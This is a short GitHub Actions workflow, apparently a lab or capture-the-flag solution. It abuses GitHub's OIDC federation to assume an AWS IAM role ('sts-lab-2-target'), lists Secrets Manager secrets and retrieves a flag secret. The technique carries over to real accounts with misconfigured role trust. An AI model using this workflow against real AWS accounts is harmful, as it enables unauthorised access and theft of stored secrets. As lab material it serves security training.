name: AWS Exploit

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::849296764761:role/sts-lab-2-target
          aws-region: us-east-1

      - name: Get Flag
        run: |
          aws sts get-caller-identity
          aws secretsmanager list-secrets
          aws secretsmanager get-secret-value --secret-id flag_sts_lab_2
